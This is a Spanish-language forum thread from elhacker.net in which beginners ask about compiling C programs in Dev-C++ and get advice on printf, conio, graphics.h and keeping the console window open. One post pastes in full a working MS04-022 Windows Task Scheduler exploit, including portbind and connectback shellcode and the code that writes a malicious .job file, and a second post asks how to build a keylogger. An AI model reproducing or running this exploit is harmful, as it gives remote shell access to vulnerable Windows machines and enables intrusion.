Foro de elhacker.net

Programación => Programación C/C++ => Mensaje iniciado por: CrAkEnçDeMoN en 18 Junio 2004, 06:39 am



Título: Novato en C y Dev-c++
Publicado por: CrAkEnçDeMoN en 18 Junio 2004, 06:39 am
q onda  8)
soy nuevo en esto segun las recomendaciones acerca de los compiladores he estado usando el Devc-++ para empezar a programar en C pero me aparecen algunas variaciones en el codigo en printf (" "); q aparece como error una declaracion implicita en la funcion 'int printf' q pues no entiendo  ???

y en algunos ejercicios que he logrado hacer solo se imprimen un milisegundo y se cierra  asi q pues ni idea de lo q suceda
talvez este mal configurado el compilador o algo parecido

me gustaria q me echaran la mano en esto por q me gustaria avanzar en esto de la programacion

okas  ;)
nosvemos pronto 8)

 


Título: Re: Novato en C y Dev-c++
Publicado por: zheo en 18 Junio 2004, 09:12 am
Busca un poco en el foro y encontrarás respuestas a tus preguntas.


Título: Re: Novato en C y Dev-c++
Publicado por: Ragnarok en 19 Junio 2004, 09:28 am
te lo contesté en el otro hilo, lo traslado a este:
Citar
me aparecen algunas variaciones en el codigo en printf (" "); q aparece como error una declaracion implicita en la funcion 'int printf' q pues no entiendo 


Yo tampoco, pero si te aparece código que no has escrito yo me asustaría, a lo peor es un poltergeist.

De todas formas la función printf no la tienes que declarar, está declarada en stdio.h

Con respecto a la ventana que se cierra prueba a ejecutar el programa desde la consola de windows.

La chincheta en este hilo, ¿es un despiste?


Título: Re: Novato en C y Dev-c++
Publicado por: CrAkEnçDeMoN en 19 Junio 2004, 09:28 am
hola otra vez

tengo un problema con este ejercicio

#include <stdio.h>

int main()
{
   char nombre[20];
   unsigned int edad=0;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   fprintf( stdout, "\nHola %s. Tienes %d anyos.\n", nombre, edad );

   return 0;
}
parce q

fprintf( stdout, "\nHola %s. Tienes %d anyos.\n", nombre, edad ); es el error
okas
espero y que me echen la mano pues como apenas empiezo me salen muchos errores
okas
despues de ler las 2 primeras variables se cierra con mensaje de error


Título: Re: Novato en C y Dev-c++
Publicado por: ALF en 20 Junio 2004, 08:48 am
Yo probé y el código que publicaste no me dio ningun error. Ni idea por que te puede estar pasando eso.


Título: Re: Novato en C y Dev-c++
Publicado por: CrAkEnçDeMoN en 20 Junio 2004, 13:59 pm
q onda  8)
muchas gracias por haberme ayudado jeje se nota que soy novato en esto
he avanzado un poco gracias a este foro
solo una pregunta mas en este simple programa

 #include <stdio.h>
  int n1 ;
   int n2;
int main ()
{


printf ("dame un numero okas!\n");
scanf ("%d", &n1);
printf ("vamos carnal uno mas grande que %d", n1);
scanf ("%d",&n2);
printf ("asi esta mejor no crees\n");
return 0;
}
esta bien se ejecuta y todo pero la ultima sentencia
printf ("asi esta mejor no crees\n");
parece que la imprime  , pero como puedo hacer para que se retenga en la pantalla pues despues de imprimir esto se cierra en un abrir y cerrar  :o
okas


Título: Re: Novato en C y Dev-c++
Publicado por: ALF en 21 Junio 2004, 06:30 am
después del último printf poné...
Código:
system ("pause");
o
Código:
getch();
Con el primero te va a aparecer una linea que dice que presiones una tecla para continuar, o sea en este caso para que se cierre. El otro (getch) es casi lo mismo, pero no te aparece el texto que dice que presiones una tecla.

SaLu2


Título: Re: Novato en C y Dev-c++
Publicado por: vanship en 26 Julio 2004, 15:42 pm
recuerda que debes agregar la libreria  conio.c si usas el Dev-c++ asi tambien podes usar el clrscr(); (para borrar la pantalla).

Toy re feliz.. hace re poco que empiezo y ya pude ayudar respondiendo algo en el foro! :D


Título: Re: Novato en C y Dev-c++
Publicado por: PressOk en 27 Julio 2004, 08:13 am
recuerda que debes agregar la libreria  conio.c si usas el Dev-c++ asi tambien podes usar el clrscr(); (para borrar la pantalla).

No estoy seguro pero me parece k es #include <conio.h> en vez de .c.
y te aconsejo k cada vez k utilices la funcion scanf() a continuacion usa fflush(stdin), muchas veces dan errores logicos y no de compilacion


Título: Re: Novato en C y Dev-c++
Publicado por: Ragnarok en 27 Julio 2004, 08:27 am
no, en dev c++ es <conio.c>, en otros compiladores (borland) será conio.h y en otros no funcionará, por eso es recomendable utilizar sólo librerías estándar ANSI que tienen todos los compiladores.

Además no necesita agregarla para nada.


Título: Re: Novato en C y Dev-c++
Publicado por: zheo en 27 Julio 2004, 08:56 am
El problema es que conio.c es código es decir, no esta compilado (una biblioteca sí por lo que sólo habría que vincularla)

En este caso basta con
a) compilar conio.c y añadir el código objeto (por defecto conio.o) como parámetro al linker
b) añadir conio.c como un archivo más de código al proyecto (con lo que se compilará y vinculará como cualquier otro fichero del proyecto)

Lo que se ha de plantear es ¿necesitas REALMENTE conio? (para que quede más bonito NO es necesitar realmente)


Título: Re: Novato en C y Dev-c++
Publicado por: Griph en 5 Septiembre 2004, 06:46 am
Hola, respecto de que se te produzcan algunas variaciones es porque Dev-C++ es un compilador para C++, pero eso se puede solucionar. A veces surgen algunos problemas con las bibliotecas, es solucionable.

Y que la ventana se abra a penas unos milisegundos lo puedes solucionar haciendo uso de la función "exit" (condicionas: cuando se aprete "X" tecla, se sale del programa o se ejecuta la función exit). Esto es haciendo uso de la función exit.


Título: Re: Novato en C y Dev-c++
Publicado por: zheo en 9 Septiembre 2004, 09:48 am
Dev-c++ contiene un compilador de C y c++. Puedes indicar que compile un fichero en c o en c++ a tú elección. De hecho, al usar extensión .c, por defecto compila en C.


Título: Re: Novato en C y Dev-c++
Publicado por: CROISSANITO en 30 Septiembre 2004, 06:43 am
HOla chavales. Acabo de llegar al foro y soy novato en C aunque creo que un poco mas avanzado que CrA..
Mi primer lenguaje es este, C, y decir que a mi el Dev-C++ me coge el conio.h
Otra cosa: me podrian decir en que se basa un keylogger y un editor de textos? Es que quiero hacer un keylogger para controlar la actividad del ordenata y un editor para hacer ahi mis programas, que me gusta trabajar con ellos para saber que es lo que se echa en falta.
Un saludo a todos.


Título: Re: Novato en C y Dev-c++
Publicado por: cristianvca en 30 Septiembre 2004, 11:01 am
Yo :-\ tngo un problema con Dev c++ algunas funciones de C no me funciona no acepta necesito algun manual de Dev c++ me ayudannn--- ::) :-*


Título: Re: Novato en C y Dev-c++
Publicado por: knk1 en 5 Noviembre 2004, 06:25 am
Primero:
En la linea donde utilizas stdout estas mandando imprimir a un archivo ya que en C todos los dispositivos se tratan como archivos o ficheros, en este caso el fichero estandar es la pantalla. Te recomiendo si eres principiante en programacion que solo utilizes printf, antes de meterte en el tema de los ficheros.
Segundo:
Un keyloger no es mas que un interceptador de eventos y para programar uno en windows necesitas utilizar los hook`s que este sistema operativo te proporciona.


Título: Re: Novato en C y Dev-c++
Publicado por: Sh@dy en 6 Enero 2005, 09:58 am
A mi me gustaria aprenderl los dos pero primero quisiera saber donde descargarlos, por favor si alguien puede ayudarme le agradeceria, bueno es todo y gracias.


Título: Re: Novato en C y Dev-c++
Publicado por: SANSARA en 7 Enero 2005, 08:33 am
Ay yo igual soy nuevo en esto , y    leyendo esto  . me a servido   muchas  gracias..


Título: Re: Novato en C y Dev-c++
Publicado por: Dagonet en 22 Abril 2005, 19:14 pm
igual tengo una bronca: cuando le doy compilar me marca un error en la linea 2 pero la neta sabe que onda el error dice "unable to run program file" a ver si me pueden ayudar


Título: Re: Novato en C y Dev-c++
Publicado por: MCara en 26 Abril 2005, 02:33 am
Hola Saludos a todos
Soy nuevo en este foro y me he dado cuenta que la pregunta que voy a realizar la he preguntado en otro foro por equivocacion, aqui seguro que alguien me aclarara esto::

#include <iostream.h>
#include <stdlib.h>
#include <graphics.h>
#include <conio.h>

void borde(void);
void cuadro(int xinicial, int yinicial; int xfinal, int y final, int color);

main(void)
{
      int controlador, modo;
      register int i;
      controlador=VGA;
      modo=VGAMED;

      initgraph(&controlador &modo,"");

      borde();

      setcolor(1);
      line(0,0,639,349);

      setcolor(2);
      floodfill(110,110,1);

      setcolor(1);
      line(50200,400,125);

      for(i=0;i>640;i+=10) putpixel(i,175,5);

      circle(50,50,35);
      circle(320,175,100);
      circle(500,250,90);
      circle(100,100,200);

      setfillstyle(SOLID_FILL,GREEN);
      floodfill(500,250,1);

      getch();
      restorectrmode();
      return 0;

      void borde(void)
      {
      line(0,0,639,0);
      line(0,0,0,349);
      line(0,349,639,349);
      line(639,0,639,349);

      void cuadro(int xinicial,int yinicial, int xfinal, int yfinal, int color)
      {
      setcolor(color);

      line(xinicial,yinicial,xfinal,yfinal);
      line(xinicial,yinicial,xfinal,yfinal);
      line(xfinal,yinicial,xfinal,yfinal);
      line(xfinal,yfinal,xinicial,yfinal);
      }

Porque en turbo C/C++ lo compila sin errores y en Dev C++4 da error de Graphics, no lo entiendo, estoy empezando pero prefiero compilar con dev pero no lo entiendo ¿siguo los tutoriales de un libo de turbo C/C++ pero como no me gusta el compilador que trae de consola 16 bits, lo compilo con dev pero asi me lio con los errores, no se si lo hago mal o no, ?ademas la interfaz en ingles, ?¿que aprendemas programacion o ingles?¿ existe algun entorno de desarrollo en castelano?¿ .

Estoy muy confuso con el tema del compilador y sus errores, ?¿Cual utilizo?¿ como puedo soventar Graphics sin errores y conio.h?¿  espero que la solucion no sea manipular alguna opccion del compilador porque no se ingles ni quiero aprenderlo, solo programacion,
 ::) :o
 Gracias y que alguien depure este programilla porque ya no se donde esta el error.


Título: Re: Novato en C y Dev-c++
Publicado por: Pseudoroot en 13 Mayo 2005, 02:59 am
hasta donde yo  tengo entendido en  Dev C++..se puede programar graficos. seleccionando unos formularios diferentes a winmain y/o modo consola, sino como openGL oalgo parecido.


Título: Re: Novato en C y Dev-c++
Publicado por: zheo en 15 Mayo 2005, 01:19 am
Hola Saludos a todos
Soy nuevo en este foro
Pues a leerse las normas de publicar código anda.

La respuesta es que graphics es una biblioteca sólo de Borland, y no es estándar.


Título: Re: Novato en C y Dev-c++
Publicado por: edipo en 18 Mayo 2005, 19:46 pm
a todos yo tambien e querido compilar en devc++ y me da ciertos errores como en ejemplo

C:\DEV-C_~1\Bin\ld.exe: warning: cannot find entry symbol _WinMainCRTStartup; defaulting to 00401000
C:\DOCUME~1\ESTACI~1\CONFIG~1\Temp\ccE1caaa.o: In function `usage':
//c/dev-c_~1/include/objc/ms0402~1.c:233: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:234: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:235: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:236: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:237: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:238: undefined reference to `exit'
C:\DOCUME~1\ESTACI~1\CONFIG~1\Temp\ccE1caaa.o: In function `main':
//c/dev-c_~1/include/objc/ms0402~1.c:243: undefined reference to `__main'
//c/dev-c_~1/include/objc/ms0402~1.c:249: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:250: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:254: undefined reference to `atoi'
//c/dev-c_~1/include/objc/ms0402~1.c:257: undefined reference to `fopen'
//c/dev-c_~1/include/objc/ms0402~1.c:259: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:260: undefined reference to `exit'
//c/dev-c_~1/include/objc/ms0402~1.c:264: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:265: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:267: undefined reference to `atoi'
//c/dev-c_~1/include/objc/ms0402~1.c:268: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:270: undefined reference to `htons@4'
//c/dev-c_~1/include/objc/ms0402~1.c:271: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:272: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:273: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:274: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:279: undefined reference to `inet_addr@4'
//c/dev-c_~1/include/objc/ms0402~1.c:281: undefined reference to `htons@4'
//c/dev-c_~1/include/objc/ms0402~1.c:282: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:283: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:284: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:285: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:290: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:291: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:292: undefined reference to `fclose'

entonces que si el exploit es este
[td][/td]/* HOD-ms04022-task-expl.c:
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* Exploit version 0.1 coded by
*
*
*                 .::[ houseofdabus ]::.
*
*
* [at inbox dot ru]
* -------------------------------------------------------------------
* Tested on:
*    - Internet Explorer 6.0 (SP1) (iexplore.exe)
*    - Explorer (explorer.exe)
*    - Windows XP SP0, SP1
*
* -------------------------------------------------------------------
* Compile:
*    Win32/VC++  : cl HOD-ms04022-task-expl.c
*    Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
*    Linux       : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
*   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
*
*   Shellcode:
*        1 - Portbind shellcode
*        2 - Connectback shellcode
*
* -------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* --- Coded by .::[ houseofdabus ]::. ---
*
*
  • Shellcode: Portbind, port = 7777
*
  • Generate file: expl.job
*
* C:\>
*
* start IE -> C:\
*
* C:\>telnet localhost 7777
* Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
* (‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
*
* C:\Documents and Settings\v.X\ ¡®ç¨© á⮫>
*
* -------------------------------------------------------------------
*
*   This is provided as proof-of-concept code only for educational
*   purposes and testing by authorized individuals with permission to
*   do so.
*
*/

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include "winsock.h"
#ifdef _WIN32
#pragma comment(lib,"ws2_32")


#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif



unsigned char jobfile[] =

/* job header */
"\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00"
"\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00"

/* length */
"\x11\x11"

/* garbage C:\... */
/* unicode */
"\x43\x00\x3A\x00\x5C\x00\x61\x00"
"\x2E\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"

"\x1E\x82\xDC\x77"

/* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */
/* for Win2k use jmp ebx or call ebx  */

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x80\x31\x31\x80" /* generate exception */

"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
"\x90\x90";



/* portbind shellcode */
unsigned char portbindsc[] =
"\x90\x90"
"\x90\x90\xEB\x06" /* overwrite SEH-frame */
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";



/* connectback shellcode */
unsigned char connectbacksc[] =
"\x90\x90"
"\x90\x90\xEB\x06" /* overwrite SEH-frame */
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
"\x77\x38\xff\x55\x20\xff\x55\x0c";



/* use this form
unsigned char sc[] =
"\x90\x90"
"\x90\x90\xEB\x06" - overwrite SEH-frame
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

"... code ...";
*/

unsigned char endofjob[] = "\x00\x00\x00\x00";

#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+283+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port)

void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <file> <shellcode> <bind/connectback port> [connectback IP]\n", prog);
printf("\nShellcode:\n");
printf("      1 - Portbind shellcode\n");
printf("      2 - Connectback shellcode\n\n");
exit(0);
}

int
main(int argc, char **argv)
{
unsigned short strlen;
unsigned short port;
unsigned long ip, sc;
FILE *fp, *fp2;

printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

if (argc < 4) usage(argv[0]);

sc = atoi(argv[2]);
if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

fp = fopen(argv[1], "wb");
if (fp == NULL) {
printf("[-] error: can\'t create file: %s\n", argv[1]);
exit(0);
}

/* header & garbage */
fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
fseek(fp, 39*16, SEEK_SET);

port = atoi(argv[3]);
printf("
  • Shellcode: ");
if (sc == 1) {
SET_PORTBIND_PORT(portbindsc, htons(port));
printf("Portbind, port = %u\n", port);
fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
fwrite(endofjob, 1, 4, fp);
fseek(fp, 70, SEEK_SET);
/* calculate length (see header) */
strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
}
else {
ip = inet_addr(argv[4]);
SET_CONNECTBACK_IP(connectbacksc, ip);
SET_CONNECTBACK_PORT(connectbacksc, htons(port));
printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
fwrite(endofjob, 1, 4, fp);
fseek(fp, 70, SEEK_SET);
/* calculate length (see header) */
strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
}

printf("
  • Generate file: %s\n", argv[1]);
fwrite(&strlen, 1, 2, fp);
fclose(fp);

return 0;
}
[td][/td]
porfavor ayudenme soy algo nuevo y e leido libros que siento que se me ba a estallar el cerebro gracias


Título: Re: Novato en C y Dev-c++
Publicado por: .hackers en 12 Junio 2005, 00:13 am
Muy buenas, soy nuevo en este foro y me llamó la atención principalmente el tema de la programación en C++, actualmente estoy aprendiendo lo basico para empezar a programar en este lenguaje aunque creo que puedo ayudar un poquito.

#include <iostream.h>
#include <stdlib.h>
#include <graphics.h>
#include <conio.h>

Como han dicho por aqui, en vez de utilizar el printf o el scanf se podria usar perfectamente el cin y el cout además de que no harian falta tantos includes para una aplicación de consola. En todo caso propongo esta solución que aunque seguro no contempla todas las posibilidades es un buen comienzo.

Rectificadme si me equivoco.  :-[

Citar
#include <iostream>
using namespace std;


Título: Re: Novato en C y Dev-c++
Publicado por: Pseudoroot en 12 Junio 2005, 00:46 am
los  printf y  scanf se  itilizan mayormente en C. mientras que cin y count en C++, estos ultimos tienen  la ventaja que  no se necesita  ingresar el tipo de  dato que representaran a diferencia de printf y scanf..


Título: Re: Novato en C y Dev-c++
Publicado por: jedi_shock47 en 16 Junio 2005, 20:36 pm
una preguntita? acado de instalar el DEV-C++ Echo porgrmas peor no se como los corro? como  los pongo ejecutables , como veo la salida?  como lo compilo ?


Título: Re: Novato en C y Dev-c++
Publicado por: Pseudoroot en 2 Julio 2005, 22:47 pm
solo te vas a archivo   proyecto.,, eliges el modo que deseas  consola . o ventana de windows..
agregas el codigo ,y luego te vas al menu para compilar ,si todo esta correcto no te saldran errores y ya podras convertirlo a ejecutable


Título: Re: Novato en C y Dev-c++
Publicado por: fell FX en 2 Agosto 2005, 23:25 pm
bueno aunque el C\C++ es un lenguaje estandar
las librerias no lo son pues las de TurboC son de Turbo C y las del Dev son del DEV y ni conio ni graphics funcionan en el Dev

pues ti enes que manipular el link..

aohra si el compilador muestra tantos errores es probable que tu compilador no este bien instalado..
y si si estas utilizando C++ mejor usa cin y cout aunque genera un ejecutable mayor ..

y para crear un programa de consola es cuestionde :}

nuevo/proyecto'consola\

despues genera tu codigo y al final antes del return 0;

usa  System("pause") ó  cin.get();



Título: Re: Novato en C y Dev-c++
Publicado por: catp1710 en 29 Noviembre 2005, 01:19 am
ok acabo de revisar este codigo no soy muy bueno con c ni con c++ estoy comenzando asi q voy a ver q se puede hacer:

#include <stdio.h>

int main()
{
   char nombre[20];
   unsigned int edad=0;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   fprintf( stdout, "\nHola %s. Tienes %d anyos.\n", nombre, edad );

   return 0;
}

